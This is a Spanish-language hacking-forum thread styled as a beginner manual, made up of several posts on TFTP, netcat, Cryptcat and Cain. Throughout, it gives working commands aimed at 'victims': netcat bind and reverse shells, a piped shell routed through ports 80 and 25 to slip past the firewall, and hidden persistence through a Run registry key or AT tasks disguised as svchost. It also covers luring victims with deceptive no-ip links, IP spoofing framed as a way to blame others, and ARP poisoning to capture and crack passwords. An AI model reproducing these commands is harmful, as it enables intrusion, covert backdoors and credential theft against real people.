Manual ¿Como convertirse en Hacker? [EN CONSTRUCCION]

[fNiX]

Bueno yo en este caso Ocupare un servidor TFTP llamado SolarWinds
el cual pueden descargar de aqui --> You are not allowed to view links. Register or Login
Luego de que lo descargamos lo debemos de instalar.
al momento de ejecutarlo puede que nos salga el firewall
debemos de hacer clic en "desbloquear" ¿por que?
bueno para que no nos joda el Firewall Todo el rato.

Una Vez que lo ejecutamos nos saldra una Imagen como esta:


Podemos Ver en la configuracion que la carpeta C:\TFTP-Root
sera la carpeta en la cual apareceran los archivos que le
subamos a nuestra victima y los que descargaremos de ella.

Es Muy importante que no cerremos esta ventana
ya que se nos cerrara nuestro servidor TFTP.

Obiamente para poder subir o bajar algun archivo
necesitamos Obtener Una Shell Remota, para los que no saben.
solo necesitan buscar You are not allowed to view links. Register or Login

2-Subir Archivo
Bien para que se entienda lo pondre de esta manera:
Ip de ustedes = 123.123.123.123
Ip de Victima = 44.44.44.44
Primero que todo debemos de poner el archivo que queremos mandar en la carpeta TFTP-Root, y luego de eso nos vamos a nuestra Shell Remota y escribimos:

C:\tftp –i 123.123.123.123 get Fotodeejemplo.jpg c:\Windows

Explicacion del codigo:
Bueno primeramente necesitamos saber los controles de TFTP:

Bueno basicamente colocamos nuestro archivo en este caso
"fotodeejemplo.jpg" en la carpeta windows de nuestra victima.

1-Bajar Archivo
Bueno si Hipoteticamente nuestra victima tiene un archivo por ejemplo:
C:\foto.jpg y nosotros queremos tener esa foto.
Sencillamente vamos a nuestra Shell Remota y Escribimos

tftp –i 123.123.123.123 put c:\foto.jpg foto.jpg

Explicacion del Codigo:
Primero debemos saber en que consta el comando "Put"

Basicamente el archivo se transfiere a nosotros ^^

Bueno eso ha sido todo por hoy =P
espero que les guste a todos ^^
Cualquier duda pregunten

Salu2!

[fNiX]

¿Que es Netcat?

Netcat es una herramienta creada por Hobbit, diseñada para los Administradores, bajo licencia GPL (GNU General Public License). Ósea que es de libre distribución, y no necesitas pagar para obtenerlo ni  modificarlo.
Netcat, tiene versiones tanto para GNU/Linux, como para Windows y Apple. Y su campo de trabajo, se basa en los protocolos TCP/UDP, pudiendo realizar infinidad de tareas con los parámetros que le puedes ir dando.

"Para ciertas practicas de netcat deberemos subir el netcat al PC victima, eso lo deben de tener aprendido"
en los capitulos:
7.5 Mandar y descargar archivos por FTP
7.6 Mandar y descargar archivos por TFTP
se explica como hacer esto

el netcat lo puedes descargar de aqui:
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Luego los archivos de el Zip los deben de colocar en C:\Windows\system32
luego vayan a inicio --> ejecutar --> cmd --> y escriban "nc"
si les sale Cmd line es por que lo hicieron bien =)

Comandos de Netcat:

-d Permite que nc trabaje en forma silenciosa y se desenganche del indicador de comandos MS-DOS.
-e <comando> Un nc a la escucha podrá ejecutar el <comando> en el instante en que alguien se conecte al puerto en el que está escuchando.
-i <segundos> Intervalo de espera, que es la cantidad de tiempo que nc esperará entre dos envíos de datos sucesivos.
-g <lista-de-ruta> Se pueden especificar hasta 8 opciones –g en la línea de comandos para forzar que su tráfico nc pase por determinadas direcciones IP.
-G <puntero de saltos> Esta opción le permitirá definir que dirección IP va a ser el siguiente salto dentro de la ruta indicada con la opción –g.
-l Activa el modo escucha de nc.
-L Activa el modo escucha de nc pero con más interés.
-n Indica a nc que no realice ninguna consulta de nombres de hosts.
-o <archivohex> Realiza un volcado hexadecimal de los datos y los almacena en un archivo hexadecimal.
-p <puerto> Le permite especificar el puerto local que va a utilizar nc.
-r Nc elegirá aleatoriamente los puertos locales y remotos.
-s Especifica la dirección IP de origen que deberá utilizar nc cuando efectue sus conexiones.
-t Es capaz de controlar la negociación de opciones Telnet.
-u Indica a nc que utilice UDP en lugar de TCP.
-v Informa el estado de nc, si pones otra –v podrás obtener más información.
-w <segundos> Controla cuanto tiempo va a esperar nc antes de dar por terminada una conexión.
-z Le dice a nc que envíe la cantidad de datos necesarias para conocer en que puertos se está escuchando algo.

[fNiX]

sacando IP con netcat

vamos a nuestro MS-DOS y escribimos:

nc -L -vv -p 3131

Explicacion:
nc = netcat
-L  = dejamos escuchando un puerto
-vv = obtenemos informacion de la IP
-p 3131 = este es el puerto que usara netcat


listo ahora solo tenemos que esperar a que nuyestra victima se conecte a nosotros.

        ¿Y como hago que la otra persona se conecte a mi netcat?

 Solo ingeniería social, e ingenio de parte tuya, ya que hay muchas maneras.
  La más fácil:
 Necesitaremos de una cuenta NO-IP, (¿no sabes que es eso?)
Pues solo tienes que registrarte en una web, léete este You are not allowed to view links. Register or Login de TxShack y vuelve con la cuenta no-ip. ; )
 ***********************************************************
  PD: Al crearse la cuenta no-ip, no utilizen un nombre con la palabra Hack, o que se yo, para que no sea sospechoso. Usen nombres que llamen la atención a hacer click. Por ejemplo el mio es myphotos.myftp.biz .Ya verán el porque.
***********************************************************
  ¿Qué es una cuenta no-ip?
  Es un nombre que se pone por delante de tu ip, en vez de usarla directamente. Así si la ip cambia, la no-ip se actualiza de ella, y la puedes usar en cualquier aplicación que necesite tu ip, sin preocuparte de tener que estarla cambiando.

 Bien, yo utilizare mi cuenta no-ip: naphack.no-ip.biz . Ustedes utilicen la suya.
  Bueno. Estábamos en que nuestro netcat estaba escuchando el puerto 3131. No deben cerrarlo hasta que la otra persona se conecte a ustedes.
  Como les dije arriba, hay muchas maneras, y una muy fácil, es que ella crea que su dirección no-ip es una pagina web, y la ingrese en su explorador. JOJOJO
  Arriba les dije que se hicieran una no-ip llamativa, en mi caso es myphotos.myftp.biz .
 *Mandando el link a la persona:
 Supongamos que se lo doy por MSN, (solo es ingeniería social). Lo que le tengo que enviar no es simplemente myphotos.myftp.biz sino que debo añadir el http y el puerto, para que lo reconozca el explorador y sea el mismo puerto.
 Quedaría así:
You are not allowed to view links. Register or Login
 Pruébenlo con sus no-ip en otra consola. (No coloco mi no-ip para que no piensen mal xD)
 Y BOOM, les aparece lo siguiente:

   Al principio aparece la ip de la victima, luego nuestra ip, y al final dice LISTENING ON [nuestra ip] 3131, eso es gracias a –L, que deja a netcat nuevamente escuchando luego de recibir la conexión. 
  Además, de la información que obtuvimos, como el explorador, versión del MS-DOS, gracias al parámetro –vv.
  Otra manera de hacer la conexión, seria por cmd, o dentro de un batch:
Start You are not allowed to view links. Register or Login
Recuerden no cerrar la ventana hasta que la persona pinche en el enlace.

[fNiX]

YA ESTA DISPONIBLE EN PDF

Para todos aquellos que lo quieran descargar aqui estan dos url de descarga:

You are not allowed to view links. Register or Login

mirror brujo's (esta descarga es mas rapida y sin limite de conexion)

You are not allowed to view links. Register or Login

-[ OBTENER SHELL CON NETCAT ]-

Pues bien, como todos sabemos una de las tantas utilidades que tiene esta maravillosa herramienta es la de poder

devolvernos una shell de un equipo sin ninguna dificultad, inclusive aun estando detras de una red y por que no...

hasta del firewall de windows xp Sp2 :D.
muchos de los exploits que circulan por la red estan basados en el funcionamiento de netcat, asi de que aprender a

manejarlo es lo primero que se debe de saber.
Espero explicarme de una manera clara y sencilla de manera que a cualquiera que lea esto le quede claro como obtener una shell con netcat.

Ahora si dejemonos de tanta platica y comencemos con la practica :P...




Para mi ejemplo voy a utilizar dos equipos:
Equipo atacante [192.168.1.2]: Windows xp sp1.

Equipo victima [192.168.1.4]: Windows xp Sp2.



[SHELL DIRECTA CON LA VICTIMA]

Nota: si utilizas un puerto el cual este protegido por el firewall de windows tendras que habilitarlo previamente

para poderlo poner a la escucha.

Esto no es nada dificil de lograr lo unico que necesitamos de hacer es dejar un netcat a la escucha en la victima de

la siguiente manera  (solo decir que en win9x seria "command.com" y en un NT seria "cmd.exe"):

Código: You are not allowed to view links. Register or Login

nc -l -d -e cmd.exe -p 6000
donde los flags significan lo siguiente:
-d  (Modo Stealth o encubierto)
Esta opción desvincula al Programa de la consola, haciendolo
trabajar en el BackGround.

-e <prog>  (Ejecuta un programa cuando se conecta)
Puede ser utilizado para ejecutar incluso un Shell tanto
en WinX como en *NIX.

-l  (Escuchando conexiones)
Deja a un puerto abierto en espera de una conexión

-p <puerto> (Puerto para pegarse)
Algunas veces debes especificarle con esta
opción el puerto a realizar una acción.

-v   (modo verbose, mas información, se le puede añadir otra -v para mas
info todavia) Bastante util y necesario.

-L Es mas recomendable usar esta opcion que la opcion "-l" ya que al cerrar una conexion podemos volver a iniciarla sin necesidad de que el equipo victima vuelva a reiniciar su pc. (en mis ejemplos voy a usar -l pero sugiero poner -L)


Lo ideal es que tengas el nc.exe dentro de la carpeta system32 en caso contrario tendras que especificar la

direccion en la que se encuentra:

Código: You are not allowed to view links. Register or Login

C:\mi carpeta\nc -l -d -e cmd.exe -p 6000
una vez hecho esto solo falta que nosotros nos conectemos a la victima en el puerto especificado (en este caso es el

6000), y asi nos devolvera la shell:

Código: You are not allowed to view links. Register or Login

nc -vv 192.168.1.4 6000
Recuerden que para que este tipo de conexion funcione, la victima tiene que tener una "ip publica", esto es que sea

visible por cualquier equipo con el simple hecho de que este conectedo a internet.





[REVERSE SHELL CON NETCAT]

Este tipo de conexion es ideal para equipos que se encuentran dentro de una red, lo unico que necesitamos es que el

equipo atacante tenga una "ip publica", de esta manera sera la victima quien se conecte a nosotros y no nosotros con

el.

Para ello primero tenemos que dejar un netcat a la escucha en el equipo atacante de la siguiente manera:

Código: You are not allowed to view links. Register or Login

nc -vv -l -p 6000
ahora que el atacante esta preparado solo tenemos que hacer que la victima "sirva" la shell al puerto que tiene en

escucha el equipo atacante, de la siguiente manera:

Código: You are not allowed to view links. Register or Login

nc -d -e cmd.exe 192.168.1.2 6000





[VOLTEAR LA SHELL CON NETCAT]

Como habran observado en los dos ejemplos anteriores para poder hacer una conexion exitosa con la victima, un

requisito indispensable es que el puerto que estemos utilizando lo tengamos habilitado por el firewall, asi de que

si la victima tiene el firewall activado a la hora de que realicemos dicho proceso le va a saltar la pantalla de

alerta del firewall que tiene incluido el Sp2 y eso nos va a delatar al momento :(.

por lo tanto lo mejor que podemos hacer para que esto no ocurra seria utilizar puertos que no esten filtrados por un

firewall o por un router con firewall integrado, para ello vamos a utilizar dos puertos uno para enviar la

informacion y otro para resivirla, y como todos sabran, la mayoria de los firewall tienen habilitados los puertos

80(http) y 25(smtp), inclusive el firewall del Sp2 los tiene habilitados por default (por eso adoro a microsoft

xDDD).

Suena algo raro y ademas dificil pero ya veran que es muy facil de hacer (este tipo de conexion funciona tambien con

equipos en los cuales la victima se encuentra dentro de una red).

En primer lugar vamos a necesitar poner dos netcat a la escucha en el equipo atacante (cada uno en su propia ventana

o indicador de comando, como gusten llamarle).

en uno ponemos el puerto 80:

Código: You are not allowed to view links. Register or Login

nc -vv -l -p 80
y en el otro ponemos el puerto 25:

Código: You are not allowed to view links. Register or Login

nc -vv -l -p 25
Ya que tenemos todo listo, basta con que el equipo victima ejecute el siguiente comando (recordar que en mi ejemplo

el atacante tiene ip 192.168.1.2 o tambien puede ser uno que posea una ip publica a fin de cuentas es una conexion

inversa :D):

Código: You are not allowed to view links. Register or Login

nc 192.168.1.2 80 | cmd.exe | nc 192.168.1.2 25
y walaa!!!!! ya tenemos la shell de nuestra victima y el firewall del sp2 no dira ni pio, ya que por defecto admite

la entrada de informacion por el puerto 80 y la salida por el 25.

Ahora bien ¿como vamos a mandar los comandos a la shell remota y donde vamos a ver los resultados?
como dije anteriormente nosotros le vamos a enviar los comandos desde la ventana en la cual teniamos el netcat a la

escucha en el puerto 80 y automaticamente la victima nos va a devolver los resultados en la ventana que tiene el

netcat a la escucha en el puerto 25.






[DEJARLO COMO PUERTA TRASERA]

Una manera muy usada seria dejar una llave en el registro que nos ejecute el netcat cada que se prenda el pc

victima, para ello tenemos que hacer lo siguiente:

damos un click en inicio > ejecutar > regedit
una vez abierto el registro de windows nos ubicamos en la siguiente rama:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

damos click derecho > nuevo > valor alfanumerico.
le pònemos un nombre que no levante sospechas como rundll32, svchost, etc. ( no le vallan a poner servernetcat,

virus, etc por que los van a cachar rapidamente)
Despues le damos click derecho al valor que creamos > modificar. Y agregamos la ruta del netcat con sus respectivos

parametros:

si quieren que se quede en un puerto a la escucha:

Código: You are not allowed to view links. Register or Login

nc -l -d -e cmd.exe -p <puerto>
si quieren que conecte con una ip:

Código: You are not allowed to view links. Register or Login

nc -d -e cmd.exe ip.ip.ip.ip <puerto>
si quieren voltear la shell para que no la detcte un firewall seria (recuerden que es con la ip del atacante):

Código: You are not allowed to view links. Register or Login

nc ip.ip.ip.ip <puerto> | cmd.exe | nc ip.ip.ip.ip <puerto>solo agregar que si lo ponemos de esta manera, a la hora de que inicie el pc va a aparecer la ventana de ms-dos y si la cierra la victima perderemos la shell...
por lo tanto no olvidemos que podemos agregar la opcion -d para que permanesca oculta.
haciendo lo dicho anteriormente quedaria el comando de la siguiente manera:

Código: You are not allowed to view links. Register or Login

nc -d ip.ip.ip.ip <puerto> | cmd.exe | nc -d ip.ip.ip.ip <puerto>

Para agregar una nueva llave al registro desde una shell remota lo que tenemos que teclear seria lo siguiente:

Código: You are not allowed to view links. Register or Login

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Netcat /t REG_SZ /d "C:\nc -l -d

-e cmd.exe -p 6000"
(asi seria tomendo en cuenta que el nc esta en el directorio raiz del hdd)


una desventaja de agregar este tipo de entradas es que en las conexiones inversas el atacante primero tendria que

dejar un netcat a la escucha si no no funcionaria por lo tanto lo que podemos hacer aqui es dejarlo programado para

que se ejecute diariamente a determinada hora que nosotros ya tengamos previamente nuestro netcat a la espera de la

shell, para esto vamos a utilizar el comando AT, la sintaxis seria la siguiente:

Código: You are not allowed to view links. Register or Login

at <hora> <dia> "comando"
por lo tanto quedaria asi:

Código: You are not allowed to view links. Register or Login

at 6:00p /every:1 ""nc -d -e cmd.exe 192.168.1.2 6000""
o tambien:

Código: You are not allowed to view links. Register or Login

at 6:00p /every:1 ""nc -d 192.168.1.2 80 | cmd.exe | nc -d 192.168.1.2 25""
de esta manera ejecutara el netcat todos los dias 1 de cada mes del año a las 6:00 p.m. asi de que si quieren que se ejecute todos los dias hagan lo mismo agregando los numeros 1,2,3...30, no los intenten poner todos de un solo jalon por que no les va a funcionar, lo van a tener que hacer de uno por uno:

Código: You are not allowed to view links. Register or Login

at 6:00p /every:1 ""nc -d 192.168.1.2 80 | cmd.exe | nc -d 192.168.1.2 25""

Código: You are not allowed to view links. Register or Login

at 6:00p /every:2 ""nc -d 192.168.1.2 80 | cmd.exe | nc -d 192.168.1.2 25""

Código: You are not allowed to view links. Register or Login

at 6:00p /every:3 ""nc -d 192.168.1.2 80 | cmd.exe | nc -d 192.168.1.2 25""
Asi seria tomando en cuenta de que el nc ya se encuentre en system32, en caso contrario van a tener que poner la ruta del netcat. ejemplo:

Código: You are not allowed to view links. Register or Login

at 6:00p /every:1 ""c:\directorionetcat\nc -d 192.168.1.2 80 | cmd.exe | c:\directorionetcat\nc -d 192.168.1.2 25""
para verificar que se haya agregado la tarea solo tecleen:

Código: You are not allowed to view links. Register or Login

at
si quieren ver todas las opciones del comando at solo teclen:

Código: You are not allowed to view links. Register or Login

at -h






Espero les haya gustado mi explicacion, cualquier duda o aclaracion sobre el presente texto favor de preguntar o

decirmelo lo antes posible :P

Referencia:
You are not allowed to view links. Register or Login

zaludox y Gracias a Gospel por animarme a hacer este texto :P  (siempre terminas convenciendome de hacer este tipo de cosas xDD)

Código: You are not allowed to view links. Register or Login

Fuente:http://foro.elhacker.net/hacking_avanzado/paper_obtener_shell_con_netcat-t58032.0.html

[fNiX]

Sniffer:

Otra de las interesante posibilidades de netcat es su capacidad para
escuchar conecciones en cualquier puerto, pudiendo redireccionar todo el
trafico del mismo hacia un archivo o hacia pantalla, en este sencillo
ejemplo, podemos observar las bases de un sencillo sniffer en Windows:

    C:\nc11nt>nc -v -v -L 127.0.0.1 -p 23

DNS fwd/rev mismatch: localhost != NKRA
listening on [any] 23 …
DNS fwd/rev mismatch: localhost != NKRA
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado
password: jeje!!

Tambien podemos redireccionar toda la salida a un archivo e
irnos a realizar otras actividades ,ientras netcat hace su trabajo:

    C:\nc11nt>nc -v -v -L -p 23 127.0.0.1 -t >login.txt
    DNS fwd/rev mismatch: localhost != NKRA
    listening on [any] 23 …

[Aqui viene la connecion.]

    DNS fwd/rev mismatch: localhost != NKRA
    connect to [127.0.0.1] from localhost [127.0.0.1] 1030

[Todo lo que escriba la conneccion se va al archivo login.txt]
sent 0, rcvd 42

La opcion L permite que netcat escuche nuevamente al terminar la coneccion

Scann de Puertos

Netcat puede ser utilizado como scanner, sus multiples opciones
le permiten realizar un gran numero de combinaciones, pudiendo realizar
Scannings en Puertos Random, en puertos conocidos, en modo ascendente o
descendente, con intervalos de tiempo, utilizando gateways para evitar
mostrar la IP fuente del Scanning, etc.

    C:\nc11nt>nc -v -v -z 127.0.0.1 53 25 21

DNS fwd/rev mismatch: localhost != NKRA
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 25 (smtp): connection refused
localhost [127.0.0.1] 21 (ftp): connection refused
sent 0, rcvd 0: NOTSOCK

Pues si; aqui tienen un pequeño y primitivo scanner, se le
puede  asignarle un rango de puertos:

    C:\nc11nt>nc -v -v -z 127.0.0.1 1-53

DNS fwd/rev mismatch: localhost != darkstar
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 52 (?): connection refused
localhost [127.0.0.1] 51 (?): connection refused
localhost [127.0.0.1] 50 (?): connection refused
localhost [127.0.0.1] 49 (?): connection refused
localhost [127.0.0.1] 48 (?): connection refused etc…

Volvemos con la opcion v (verbose) y la Opcion z (zero i/o)
que es usada para scanning, los puertos se lo especificamos al final del
IP del host, bien sea individuales separados por un espacio; o por un
rango de puertos.

Espero les sirva de algo este pequeño manualillo de algunos comandos del NC

Editado por mi NKRA sal2

Código: You are not allowed to view links. Register or Login

Fuente: elblogdelhacker

[fNiX]

Enviar archivos con Netcat :

Ahora veamos como enviar un archivo, teniendo una shell remota.
En la shell remota ponemos esto, nos estamos preparando para recibir el archivo, en este caso la victima :

Ahora hacemos esto para enviar el archivo, en este caso cryptcat.exe

Ahora Veamos como cambio nuestra primera ventana :

Ahora chequemos que se haya transferido correctamente :

Como vemos el archivo cryptcat.exe se transfirio correctamente.

Código: You are not allowed to view links. Register or Login

Autor: Rockox

[fNiX]

Proteger una Shell remota con un archivo Bat y Netcat!

Primero supongamos que estamos a la escucha en una shell remota asi :

Código: You are not allowed to view links. Register or Login

nc -vlp 123
Y queremos proteger la shell que se va a dar a la maquina en escucha.
El code del Bat :
PD : La base del code es de un amigo, Lukhardy, las modificaciones y aseguramientos del code son mios.

Código: You are not allowed to view links. Register or Login

@echo off
color 0a
Title Shell protected!
:Restringido
cls
Echo                               Area restringida!
echo                     Esta shell esta restringida por RockoX!
pause>nul
:Acceso1
cls
set /p login=Introduzca el nombre de usuario :
if ["%login%"]==[""] (
cls
echo                               No has puesto nada!
pause>nul
goto Acceso1
goto :EOF
)
if %login%==RockoX (
cls
goto :Password
) else (
goto :Denegado
)

:Password
cls
set /p pass=Introduzca el password :
if ["%pass%"]==[""] (
cls
echo                              No has puesto nada!
pause>nul
goto Password
)
if %pass%==Flaquita (
goto Acceso
) else (
goto Denegado
)

:Acceso
cls
echo Shell remota obtenida satisfactoriamente!
@cmd.exe /k cd %windir%\system32
cls
echo            --- LA CONEXION SE HA TERMINADO ---
goto :eof

:Denegado
cls
Echo El login o el password es incorrecto!
echo Pulse cualquier tecla para continuar o salga ahora.
pause>nul
goto Acceso
Luego guardamos ese code con cualquier nombre, en mi caso use el nombre de Shellprotected.bat.
Luego supongamos que enviaremos la shell a la maquina en escucha pero incluido el batch para que actue y pida una pass a la maquina que esta en escucha :
Primero se la enviamos asi :

Código: You are not allowed to view links. Register or Login

nc -d -e Shellprotected.bat IP puerto
En la maquina en escucha le saldra esto :


Y en que caso de que el usuario no sepa la pass que esta especificada en el bat no lo dejara continuar :

[fNiX]

You are not allowed to view links. Register or Login
Este manual nos explica:
-como troyanizar con netcat
-transformar netcat en un cleinte [smpt y FTP]
-Mail Bomber con Netcat

[fNiX]

IP Spoofing con Netcat

Bien, buenas a todos.
Estaba viendo un artículo y me ha parecido interesante.
Puede que haya gente que ya lo sepa, pero yo por ejemplo no conocía esa opción de Netcat
Acá les dejo el tutorial:
[/hr]


Published by: iandude, on 2005-07-04 00:30:01
For this tutorial, you will need to download netcat...
You are not allowed to view links. Register or Login

Okay, so you wanna know how to ip spoof with netcat, eh? okay, I can teach you.
But there is one small problem with this technique: It hardly ever works anymore.
The reason is because the way we're doing it uses "source routing", and in this case,
"loose source routing." Basicly, this just tells the packets that they must travel along
a certain path before/after getting to their actual destination. Well lets get to it, shall we?

First, lets start by a simple connection command with netcat:

nc xxx.xxx.xxx.xxx 80.

Obviously, this tells it to connect to someone on port 80.
Okay, now that we know how to make a connection, lets make it look like we're
someone else instead

nc -s [random ip, lets say aol.com] xxx.xxx.xxx.xxx 80.

now, by using "-s", it allows us to change
the source ip; meaning we can pose as someone else. Now this is great and all for trying to frame
someone for doing it, but if you want the info to get back to you, we gotta use a technique called
loose source routing. As explained at the beginning, this just makes the traffic travel on a certain route,
but since this is "loose" we dont have to define EVERY hop, like you would in strict. This makes it
incredibly easy to ip spoof. But again, this traffic is mostly blocked. Now, Strict source routing could
be much better, but in that, you must define EVERY hop the traffic must take...see how this could
be hard to use? anyway, back to the tutorial:

nc -s [random ip, lets say aol.com] -g [your ip] xxx.xxx.xxx.xxx 80.

okay, now by using "-g" we are able to define a loose path for our traffic to flow. now if we put our ip in there,
and have our computer listening for it, we can easily get all the info pack while still looking like someone
else.

Hope this helped some people, i'm out.
Drop me a line.
[/hr]

Pues espero que les sirva
Fuente: You are not allowed to view links. Register or Login

[fNiX]

tu --> servidor
victima --> cliente

tu --> nc -L -p 3131 -vv
Victima --> nc cuenta_no-ip.com 3131

y listo, ya tienes un chat privado =D

[fNiX]

@echo off
echo connecting you to irc x.net
nc -v [ip] 6667
user aaaa
nick fnix_genial

[fNiX]

Banner Grabbing con Netcat
• nc -nvv xxx.xxx.xxx.xxx 80
• nc -nvv xxx.xxx.xxx.xxx 8080
• HEAD / HTTP/1.0
• [Carriage]
• [Carriage]
• nc -v You are not allowed to view links. Register or Login 80 < get.txt Retrieve from a
web site check for file presence.
• Your get.txt file will contain "GET HTTP/1.0\n\n"
echo "blahblahblah" | nc example.host 80 >
default.htm
cat get.txt | nc example.host 80

[fNiX]

¿Que es Cryptcat?

R: Es un software que tiene exactamente la misma funcionalidad que netcat a diferencia que su transferencia de
paquetes son encriptados, en otras palabras mas simples es lo mismo que el netcat pero cuando alguien está
monitoreando su red ya no podrá ver lo que está pasando…

Crypticat tiene los mismos comandos que netcat
aqui tenemos un Manual que nos enseña algunos usos para cripticat y Tambien para Netcat ^^

You are not allowed to view links. Register or Login

[fNiX]

You are not allowed to view links. Register or Login

[fNiX]

Envenenamiento ARP

Hola a todos, como veo que esto no ha sido posteado, pues me veo obligado a postearlo para que todos aprendamos =P

Conocimiento Previo:
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Herramientas:
You are not allowed to view links. Register or Login

Teoria:
Por lo General las Redes entre varios computadores se hace por Ethernet
El protocolo Etheret trabaja embiando informacion a todos los Host de la Red Mediante Paquetes. el paquete tiene la direccion de la maquina remota.
Solamente la maquina con la direccion puede aceptar el paquete.
You are not allowed to view links. Register or Login

En en caso de las redes compartidas You are not allowed to view links. Register or Login Todas las tarjetas de red reciven los paquetes y rechasan las que no son para ellas.
Eso significa que la informacion es entregada a todas las maquinas
independientemente si la informacion iva para una maquina especifica de esa red. cuando la informacion llega a la tarjeta, esta la descarta si no va para ella. en este tipo de redes, se debe de sniffear todos los paquetes que pasan por nuestra tarjeta de Red.

En el caso de las conmutadas "switches", los datos no viajan por toda la Red. el trafico entre el cliente y el servidor solo circulara entre ellos. sin que las otras tarjetas se enteren. osea "el resto de la red no participa en la comunicacion"

Cliente --> Maquina --> Router --> Internet ---> Servidor

Si deseamos ver el trafico que circula entre ellos debemos posisionarnos como "man in the middle"

Cliente --> Maquina "sniffer" --> Router --> Internet --> Servidor

Para lograr esto debemos envenenar las tablas ARP de la vicitma

Finalmente para el que no entiende absolutamente nada
aqui puede ver que es un sniffer --> You are not allowed to view links. Register or Login

Al Ataque:
Luego de que nos descargamos el Cain y lo instalamos
lo debemos de ejecutar, nos saldra esta pantalla:


Luego de eso nos vamos a la solapa Sniffer, y activamos el Sniffer.


Luego Hacemos Clic en el Signo "+" y nos saldra esta ventana:
"la cual nos permite escanear todo el rango de ips de nuestra red local.


Luego apretamos OK y luego del escaneo tendremos algo como esto:

"si estubieramos en un medio compartido con tan solo el sniffer el ataque ya esta listo"

Ahora debemos de hacer el envenenamiento ARP en la pestaña Sniffer,
abajo hacemos clic en "APR" y presionamos el Boton "+" y nos aparecera esta imagen:

Aqui debemos seleccionar los computadores que queremos envenenar, y si queremos sniffear toda la red, hacemos clic en la IP del router.

Y listo solo nos queda activar el envenenamiento ARP para eso debemos de hacer clic en este boton:


Ahora solo debemos esperar que algun usuario inicie sesion
en algun servidor, cuando esto ocurra el Cain va a capturar su pass.


Y con esto nos podemos Conectar por FTP =P

Si un Password te aparece en blanco sencillamente tiene que hacer esto:
clic derecho --> Send To Cracker

esto lo que hace es mandar sus Hashes a el crackeador del Cain.
Luego nos vamos a la solapa Cracker y hacemos esto:
Clic derecho --> Start Brute Force Atack

Esto toma su tiempo pero obtendremos la contraseña ^^

Por darles un ejemplo si vamos a HTTP en passwords
y la persona se mete a una pagina y coloca su contraseña
nosotros la podremos ver perfectamente con nuestro Cain ^^


Pero Esto mis queridos amigos es mas peligroso de lo que parece
la persona con tan solo tener el Cain puede acceder
a todas nuestras contraseñas de estos protocolos:


Y si nosotros queremos revisar nuestro correo de hotmail
a esa persona que esta en ese momento haciendo el envenenamiento ARP
podra verlo perdectamente =O, password de telnet,ftp,Pop3,etc.

Bueno eso ha sido todo por hoy ^^ espero que les guste

Salu2!

You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login